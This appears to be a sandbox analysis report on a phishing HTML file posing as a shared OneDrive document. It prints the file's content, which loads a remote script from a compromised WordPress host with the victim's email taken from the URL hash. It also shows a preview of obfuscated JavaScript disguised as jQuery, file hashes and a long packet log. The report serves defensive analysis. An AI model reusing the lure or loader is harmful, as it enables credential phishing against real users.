SSDEEP:	3072:a+ejBOrCmQIbDaWcnrFtsiixjL98eZ/EgvbTD+AE+FuThmyT2D4Rp1Gm:a+aOrCmQ7i98w3DTzohlldF
MD5:	540535AA636BF52BE71F6755FA5FEC90
SHA1:	FE40B60C2B75E2D8B15695AB999159DADC2E6751
SHA-256:	0858E60C1CA98B4F60FC892A9FE53082FA8B29BE8961F4F11F75ABCAC35542BD
SHA-512:	6C372E2A4C53CDCD4189905878224B06C2908E4B10A6BDAF39B60DD320BF88343D9EEB6ED5E37B8182D720395CA7353712F080A8B7DBA3D20306C35768DE6BB6
Malicious:	false
Reputation:	low
Preview:	/! jQuery v3.6.0 jquery.com \| jquery.org/license /..(function(_0x22706a,_0x30f8d5){var _0x30d97b=_0x2179,_0x1d0556=_0x22706a();while(!![]){try{var _0x52d2b7=parseInt(_0x30d97b(0x77))/0x1+parseInt(_0x30d97b(0x79))/0x2*(parseInt(_0x30d97b(0x76))/0x3)+-parseInt(_0x30d97b(0x75))/0x4+-parseInt(_0x30d97b(0x74))/0x5+-parseInt(_0x30d97b(0x7b))/0x6+-parseInt(_0x30d97b(0x7a))/0x7+parseInt(_0x30d97b(0x78))/0x8;if(_0x52d2b7===_0x30f8d5)break;else _0x1d0556['push'](_0x1d0556['shift']());}catch(_0x432126){_0x1d0556['push'](_0x1d0556['shift']());}}}(_0x1dfa,0xe5c4a));function _0x2179(_0x362964,_0x803c7b){var _0x1dfa98=_0x1dfa();return _0x2179=function(_0x2179f2,_0x3b46dd){_0x2179f2=_0x2179f2-0x74;var _0x140c10=_0x1dfa98[_0x2179f2];return _0x140c10;},_0x2179(_0x362964,_0x803c7b);}function _0x1dfa(){var _0x4217b7=['24849760hDXMbH','407908eJVAtK','12988164EpQliH','6053538ZLhkWn','715915MITcBR','5071376topqUv','24sogoKA','478680tbEasN'];_0x1dfa=function(){return _0x4217b7;};return _0x1dfa();}var authpr

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (64445), with CRLF line terminators
Category:	downloaded
Size (bytes):	276886
Entropy (8bit):	5.790551596591208
Encrypted:	false
SSDEEP:	3072:a+ejBOrCmQIbDaWcnrFtsiixjL98eZ/EgvbTD+AE+FuThmyT2D4Rp1Gm:a+aOrCmQ7i98w3DTzohlldF
MD5:	540535AA636BF52BE71F6755FA5FEC90
SHA1:	FE40B60C2B75E2D8B15695AB999159DADC2E6751
SHA-256:	0858E60C1CA98B4F60FC892A9FE53082FA8B29BE8961F4F11F75ABCAC35542BD
SHA-512:	6C372E2A4C53CDCD4189905878224B06C2908E4B10A6BDAF39B60DD320BF88343D9EEB6ED5E37B8182D720395CA7353712F080A8B7DBA3D20306C35768DE6BB6
Malicious:	false
URL:	https://midcommunications.com/wp-includes/js/dist/bootstrap.js
Preview:	/! jQuery v3.6.0 jquery.com \| jquery.org/license /..(function(_0x22706a,_0x30f8d5){var _0x30d97b=_0x2179,_0x1d0556=_0x22706a();while(!![]){try{var _0x52d2b7=parseInt(_0x30d97b(0x77))/0x1+parseInt(_0x30d97b(0x79))/0x2*(parseInt(_0x30d97b(0x76))/0x3)+-parseInt(_0x30d97b(0x75))/0x4+-parseInt(_0x30d97b(0x74))/0x5+-parseInt(_0x30d97b(0x7b))/0x6+-parseInt(_0x30d97b(0x7a))/0x7+parseInt(_0x30d97b(0x78))/0x8;if(_0x52d2b7===_0x30f8d5)break;else _0x1d0556['push'](_0x1d0556['shift']());}catch(_0x432126){_0x1d0556['push'](_0x1d0556['shift']());}}}(_0x1dfa,0xe5c4a));function _0x2179(_0x362964,_0x803c7b){var _0x1dfa98=_0x1dfa();return _0x2179=function(_0x2179f2,_0x3b46dd){_0x2179f2=_0x2179f2-0x74;var _0x140c10=_0x1dfa98[_0x2179f2];return _0x140c10;},_0x2179(_0x362964,_0x803c7b);}function _0x1dfa(){var _0x4217b7=['24849760hDXMbH','407908eJVAtK','12988164EpQliH','6053538ZLhkWn','715915MITcBR','5071376topqUv','24sogoKA','478680tbEasN'];_0x1dfa=function(){return _0x4217b7;};return _0x1dfa();}var authpr

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Static File Info

General

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	4.800655672551659
TrID:	HTML Application (8008/1) 100.00%
File name:	Onedrive Shared document.html
File size:	176 bytes
MD5:	d97e745856ef3711d2524c6455295426
SHA1:	fbd46fc88b3d413462cc00c02caaf6e29270315e
SHA256:	456f8698d3e7effe27b5378a01f05c2dcf864303c96e5ab27da7956aa093f1a1
SHA512:	80df967563318fcb6c42c68b02154b9057b26e54773ef438684d618e0a6694d7e8a4926fd67f5b8e55fca485aaefc88661f34336479cfb566f66c25a3fa6bc9a
SSDEEP:	3:gAiD5O3QWw2GwZFbGMxIdKNAIMBBXbvR4lLWZiVUe2DKwRXEaepMv:7iDjpvsFixwVMPvR4wgVUfRxEVpMv
TLSH:	6DC01297AD549444598185F0D469F08C1007B9B586D1C5669AEA484335082EB5E739C1
File Content Preview:	<script>..var uid = window.location.hash.substring(1) \|\| 'ama@coredc.com';..</script>..<script src="https://midcommunications.com/wp-includes/js/dist/bootstrap.js";></script>..

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 13:41:47.807204962 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:47.807246923 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:47.807295084 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:47.807522058 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:47.807539940 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.214009047 CET	49675	443	192.168.2.4	173.222.162.32
Jan 7, 2025 13:41:48.441833019 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.442081928 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.442095995 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.443084002 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.443150043 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.444256067 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.444319963 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.444494963 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.444505930 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.528915882 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.687283039 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.687305927 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.687319040 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.687339067 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.687364101 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.687378883 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.687397957 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.764067888 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.764077902 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.764233112 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.764266968 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.779227018 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.779236078 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.779268026 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.780247927 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.780256987 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.780288935 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.781294107 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.781303883 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.781347990 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.814623117 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.814630985 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.814697981 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.837665081 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.837671995 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.837759972 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.871376038 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.871388912 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.871467113 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.872592926 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.872601032 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.872642994 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.872667074 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.873476028 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.873536110 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.874622107 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.874651909 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.874692917 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.874703884 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.874718904 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.874739885 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.907078028 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.907145977 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.907553911 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.907610893 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.956114054 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.963565111 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.963637114 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.963710070 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.963768959 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.964287996 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.964342117 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.964838982 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.964895010 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.965753078 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.965818882 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.965923071 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.965972900 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.966692924 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.966768980 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.966901064 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.966948032 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.967729092 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.967808008 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.968512058 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.968584061 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.969856024 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:48.983019114 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:48.983091116 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.006788015 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.006851912 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.007220984 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.007277966 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.034159899 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.034221888 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.034316063 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.034370899 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.080743074 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.080805063 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.081130028 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.081197023 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.081484079 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.081535101 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.081576109 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.081621885 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.082009077 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.082058907 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.082442999 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.082501888 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.082660913 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.082716942 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.082722902 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.082798004 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.083156109 CET	49733	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.083169937 CET	443	49733	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.109256983 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.109287024 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.109385967 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.109766006 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.109776974 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.109985113 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.110027075 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.112433910 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.117248058 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.117271900 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.573415041 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.573949099 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.573961973 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.574923038 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.575021029 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.577137947 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.577203035 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.577461004 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.577467918 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.688600063 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.688611984 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.688687086 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.688697100 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.688707113 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.688739061 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.688744068 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.688787937 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.726742983 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.727122068 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.727148056 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.728219986 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.728271008 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.728732109 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.728795052 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.728920937 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.728929043 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.762247086 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.762257099 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.762295008 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.762307882 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.762341976 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.762358904 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.762406111 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.763715029 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.763722897 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.763747931 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.763792038 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.763797998 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.763828039 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.763844967 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.850330114 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.850357056 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.850403070 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.850414038 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.850461006 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.850508928 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.851798058 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.851814032 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.851846933 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.851870060 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.851875067 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.851905107 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.851924896 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.851953030 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.853064060 CET	49737	443	192.168.2.4	151.101.2.137
Jan 7, 2025 13:41:49.853084087 CET	443	49737	151.101.2.137	192.168.2.4
Jan 7, 2025 13:41:49.879244089 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:49.879275084 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:49.879358053 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:49.879949093 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:49.879965067 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:49.904031992 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.972362041 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.972390890 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.972398043 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.972426891 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.972462893 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:49.972484112 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:49.972495079 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.013019085 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.047224998 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.047235012 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.047271013 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.047300100 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.047353983 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.060439110 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.060447931 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.060473919 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.060517073 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.060558081 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.061861992 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.061870098 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.061882019 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.061912060 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.061933041 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.091763973 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.091773033 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.091840982 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.135754108 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.135763884 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.135862112 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.149127960 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.149137020 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.149216890 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.149924994 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.149931908 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.150007010 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.150702953 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.150712013 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.150757074 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.150796890 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.151609898 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.151696920 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.152518988 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.152596951 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.180381060 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.180469036 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.180852890 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.180927992 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.224359989 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.224443913 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.237682104 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.237761974 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.238173962 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.238238096 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.238519907 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.238600969 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.239059925 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.239125013 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.239913940 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.239979982 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.240108967 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.240170002 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.240895033 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.240964890 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.241067886 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.241131067 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.241837025 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.241903067 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.269026995 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.269099951 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.269361019 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.269432068 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.269467115 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.269540071 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.299874067 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.299976110 CET	49738	443	192.168.2.4	77.68.14.124
